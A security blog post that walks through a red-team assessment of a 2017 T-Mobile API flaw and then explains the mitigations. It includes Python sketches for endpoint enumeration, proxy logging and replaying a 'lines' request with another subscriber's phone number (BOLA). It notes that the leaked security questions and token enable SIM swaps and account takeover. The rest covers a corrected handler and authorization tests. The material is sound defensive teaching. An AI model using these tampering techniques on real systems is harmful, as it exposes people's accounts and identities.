Almost every organization has perforations in its deployed technology.

 

Identifying and understanding where those perforations can lead to serious vulnerabilities is essential to understanding an organization’s cybersecurity risk. The challenge most organizations face is that they miss the opportunity to use multiple perspectives to inform risk across a system’s lifecycle.

 

Our goal with this month’s series of blogs is to highlight these perspectives by providing an in-depth analysis of each point of view. Each one informs the others, strengthening overall cyber resilience in an organization and maturing the systems we rely upon.

 

In this series, using a 2017 T-Mobile web application case study, we will examine these perspectives through:

  • A red teamer’s point of view, assessing a system in production
  • A development-focused point of view examining the late stages of a Secure Development Lifecycle (SDLC) with emphasis on Quality Assurance
  • A holistic point of view of the design phase and application threat modeling

Through this method, we’re going to start at the end and work our way backwards, showing how a vulnerability that made it to production in a real-life case study could have been found earlier.

 

We’ll start with the red teamer’s perspective.

 

Why the Red Teamer’s POV Matters

There is no better way to understand a system than to contract a team of experienced offensive security professionals to find the gaps and vulnerabilities that could cause great risk and harm to an organization.

 

These “red teamers” are attackers without the risk. They work alongside the blue team to provide lessons in strengthening the design process, building incident response capabilities, and choosing the defensive actions a blue team needs once it understands what attackers are after.

 

This perspective provides an invaluable answer to the question “what would happen if we were breached?” without the pain of it actually occurring. Further, combining a red team and blue team during these simulated “attacks” builds stronger cross-disciplinary culture and communication.

 

Analysis — A Red Teamer’s Journey

Let’s look at a situation as if we are a red team or penetration tester contracted to assess a web application for T-Mobile. The T-Mobile security team has provided specific rules of engagement, and now our team is ready to get started.

 

Our first step when interacting with a system is to enumerate the platform and identify the attack surface. As we start interacting with the application, we want to determine which areas can be accessed and in what ways.

 

Since these can vary based on level of access, we also want to identify the roles that exist, such as an anonymous user and/or an authenticated user, as well as the transitions between them. While interacting with the application, we can record the workflows that exist and the resources they call during execution to determine where we can start our meddling.
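
As a concrete illustration, a rough sketch like the one below can help map which endpoints each role can reach. This is a hypothetical example only; the base URL, candidate paths, and token are placeholders, not the actual application under test.

```python
# Hypothetical sketch: probe candidate paths as an anonymous user and as an
# authenticated user to see how the reachable surface differs by role.
import requests

BASE_URL = "https://app.example.com"                    # placeholder target
CANDIDATE_PATHS = ["/profile", "/lines", "/billing", "/admin"]
AUTH_TOKEN = "REDACTED-TEST-ACCOUNT-TOKEN"              # token for our own test account

def probe(path, token=None):
    """Request a path with or without credentials and summarize the reply."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    resp = requests.get(BASE_URL + path, headers=headers, timeout=10)
    return resp.status_code, len(resp.content)

for path in CANDIDATE_PATHS:
    # Compare status codes and response sizes across roles to spot differences.
    print(f"{path:10} anonymous={probe(path)} authenticated={probe(path, AUTH_TOKEN)}")
```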

 

While enumerating the attack surface, there will be many false starts and promising paths. Often, we’ll go down a path as soon as we identify it if it looks promising. Even more often, we’ll enumerate it and then decide on a priority based on probability of success and impact of exploitation. If we were real attackers, we would just go for the juiciest thing we found first. However, we’re here to provide an impactful assessment of the system in scope. We want to record everything.

 

The next step is to triage these opportunities to see which are most likely to allow for some level of control.

 

Imagine we’ve now tried several viable options; we’ve analyzed existing workflows and how they currently operate. Once we have achieved an understanding of the normal flow of the application, we begin to identify points in the workflows where we can introduce anomalous behavior. This could be a point that allows for fault injection (we do love to throw unstructured data at inputs), but in our analysis the most promising one was discovered during normal account operations.

 

A request for the application’s profile page triggers a series of network requests to different APIs, which then provide the information the browser displays. Breaking down each of these requests into its components gives us a wide field within which to play.

 

Let’s point our web application proxy at this connection and let it record the requests and replies for us.
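
One lightweight way to do that recording, assuming we route the browser through mitmproxy, is a small addon script along these lines. The “api” substring filter is just an assumption about how the endpoints are named.

```python
# record_api_calls.py: a minimal mitmproxy addon sketch.
# Run with: mitmdump -s record_api_calls.py, then browse the profile page
# through the proxy so every API request/response pair gets logged.
from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    """Print one line per completed request/response pair that looks like an API call."""
    if "api" in flow.request.pretty_host or "/api/" in flow.request.path:
        print(
            flow.request.method,
            flow.request.pretty_url,
            "->",
            flow.response.status_code,
            f"({len(flow.response.content)} bytes)",
        )
```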

 

A meme of a man looking at a butterfly. The man is labeled “attacker” and the butterfly is labeled “API.” At the bottom of the meme, a caption reads: “Is this an attack surface?”
Only one way to find out!

 

That’s weird: the “lines” API endpoint takes both our authentication token and another argument… one that looks like it might be an object reference. Our first instinct here is to see what happens if we lie.

 

In this screenshot, the “lines” API endpoint is illustrated. It takes both our authentication token and another argument.

 

In this case, the object identifier being sent has a very predictable format: it’s a phone number. This lets us quickly formulate alternative inputs and analyze the responses to see if we can gain further knowledge. By mutating this phone number into another valid T-Mobile phone number, we discover that the returned information isn’t for us, the attackers, but for the owner of the mutated phone number, even though we’re still using the attacker’s access token! Quirky.
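
A minimal sketch of that mutation looks roughly like the following, assuming the captured request resembles it; the endpoint path, parameter name, token, and phone numbers are all illustrative stand-ins rather than the real request.

```python
# Replay the captured "lines" request, changing only the object reference
# (the phone number) while keeping our own access token.
import requests

API_URL = "https://app.example.com/api/lines"    # hypothetical endpoint path
ATTACKER_TOKEN = "REDACTED-ATTACKER-TOKEN"       # token issued to *our* account
OUR_NUMBER = "15555550100"                       # number the app originally sent
OTHER_NUMBER = "15555550199"                     # another valid-looking number

def fetch_line_info(msisdn):
    """Request line details for a given phone number using the attacker's token."""
    resp = requests.get(
        API_URL,
        params={"msisdn": msisdn},
        headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"},
        timeout=10,
    )
    return resp.status_code, resp.text

print(fetch_line_info(OUR_NUMBER))    # baseline: our own data
print(fetch_line_info(OTHER_NUMBER))  # the BOLA check: this should fail, but doesn't
```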

 

There are two very fun things about this attack. One, it provides us with valuable information disclosure about the user and about the internal mechanism by which user IDs are built. We can take this information and use it in other API calls that take internal identifiers as arguments. Two, the returned data includes authentication mechanisms (challenge and response information, including the questions created by the user), which call centers then use to verify the account owner’s identity.

 

Jackpot. With this information, we can perform social engineering activities such as a SIM swap to take over the user’s phone number. And while we’re at it, we’ll use that handy “access token” field to fully compromise the user’s account.

 

A meme of a girl smugly watching a house burn down. The burning house is labeled “Your Application.”
Not the ideal scenario.

 

T-Mobile Receives Our Report. Now What?

 

There are two main ways an organization can learn about the vulnerability impacting this T-Mobile application:

  1. Cross-Discipline Communication (Red Teams talking to Blue Teams)
  2. “Shifting Left” in Early Phases of Development with QA/Exploratory Testing and Threat Modeling

 

How do these two approaches happen, and what makes them different?

 

The first is diagnostic, while the second is proactive.

 

Cross-Discipline Communication and Learning (Red Teams Talking to Blue Teams)

 

Through cross-discipline communication, an existing application is assessed by a red team in order to inform the defenders on the blue team of potential vulnerabilities that could be exploited. The blue team can then collaborate with the red team to mitigate these types of attacks.

 

That exchange of expertise results in an enhanced understanding of the defenses required to improve the security posture of the organization’s applications and systems. In other words, the blue team and application developers learn from the red team’s mindset and can integrate it into their future design life cycles.

 

In this case, the root cause of the vulnerability is a mix of two classic API security problems: Excessive Data Exposure (way too much information came back in the reply to our request!) and Broken Object Level Authorization (we shouldn’t be able to see someone else’s data!).
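
To make the two failure modes concrete, here is a rough sketch of what a corrected server-side handler could look like. This is a generic Flask-style illustration with toy in-memory data, not T-Mobile’s actual code: the object-level check addresses BOLA, and the explicit response shape addresses Excessive Data Exposure.

```python
# Illustrative fix only; the route, data model, and token handling are toy stand-ins.
from flask import Flask, abort, jsonify, request

app = Flask(__name__)

# Toy in-memory data: which numbers each token owns, and what a "line" record holds.
TOKEN_OWNS = {"token-alice": {"15555550100"}, "token-bob": {"15555550199"}}
LINES = {
    "15555550100": {"msisdn": "15555550100", "plan": "Unlimited", "status": "active",
                    "security_question": "Name of first pet?"},        # internal-only field
    "15555550199": {"msisdn": "15555550199", "plan": "Prepaid", "status": "active",
                    "security_question": "Mother's maiden name?"},     # internal-only field
}

@app.route("/api/lines")
def get_line():
    token = (request.headers.get("Authorization") or "").removeprefix("Bearer ").strip()
    owned_numbers = TOKEN_OWNS.get(token)
    if owned_numbers is None:
        abort(401)                      # unknown or missing token

    msisdn = request.args.get("msisdn", "")

    # Broken Object Level Authorization fix: the referenced object must belong to the caller.
    if msisdn not in owned_numbers:
        abort(403)

    line = LINES[msisdn]

    # Excessive Data Exposure fix: return only what this view needs; never the raw
    # internal record (no security questions, no internal identifiers).
    return jsonify({"msisdn": line["msisdn"], "plan": line["plan"], "status": line["status"]})

if __name__ == "__main__":
    app.run()
```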

 

The Open Web Application Security Project (OWASP) has great resources on these vulnerability classes: the API Top 10, BOLA, and EDE. By helping the developers and defenders understand the path to exploitation and the impact of the vulnerabilities, the red team can not only help close this issue, but also prevent similar ones from making it to production in the future.

 

“Shifting Left” in Early Phases of Development with QA/Exploratory Testing and Threat Modeling

 

Now let’s examine the approach where we “shift left.” This is something we’ve discussed in greater detail in a previous blog, “Pull from the Right — because we resist the push.”

 

Learning the attacker’s point of view empowers developers to apply that knowledge through QA and exploratory testing, helping find vulnerabilities earlier in the process.

 

Quality Assurance team members, using exploratory testing methods, can probe inputs and process flows for anomalous behavior in several ways, including dynamic and static application security testing (DAST/SAST) tools and manual or automated fuzzing. This provides the opportunity to catch bugs and vulnerabilities in code prior to release.
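
For instance, the exact abuse we performed earlier can be encoded as an automated regression check that runs against a staging build on every release. The sketch below is hedged: the base URL, endpoint, parameter, test tokens, and field names are assumptions made for illustration.

```python
# test_lines_authz.py: run with pytest against a staging instance.
import requests

BASE_URL = "https://staging.example.com/api/lines"   # hypothetical staging endpoint
ALICE_TOKEN = "REDACTED-ALICE-TOKEN"                 # test account that owns 15555550100
ALICE_NUMBER = "15555550100"
BOB_NUMBER = "15555550199"                           # owned by a *different* test account

def _get_line(msisdn, token):
    """Fetch line details for a phone number using the given access token."""
    return requests.get(
        BASE_URL,
        params={"msisdn": msisdn},
        headers={"Authorization": f"Bearer {token}"},
        timeout=10,
    )

def test_cannot_read_another_users_line():
    """Requesting someone else's line with our token must be rejected."""
    resp = _get_line(BOB_NUMBER, ALICE_TOKEN)
    assert resp.status_code in (401, 403, 404)

def test_own_line_response_excludes_sensitive_fields():
    """Even for our own line, the reply must not leak verification secrets."""
    resp = _get_line(ALICE_NUMBER, ALICE_TOKEN)
    assert resp.status_code == 200
    assert "security_question" not in resp.json()
```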

 

To move the emphasis even “further left,” there is an opportunity for developers to begin thinking about the vulnerability before the code is even written and tested. Development teams can implement Threat Modeling, a method for assessing a system or application’s design for the ways it could be abused.

 

While Threat Modeling is not a new concept, it has recently seen a reemergence in the community as security teams are working more closely with development teams. If the developers make choices already knowing about the possible security implications of their design and implementation, they can choose more secure options, or mitigate as they build, requiring less external mitigation and remediation by later teams.

 

In our next blog, we’ll explore in further depth the SDLC process as it relates to QA and automated testing and how “shifting left” is vital to the development process.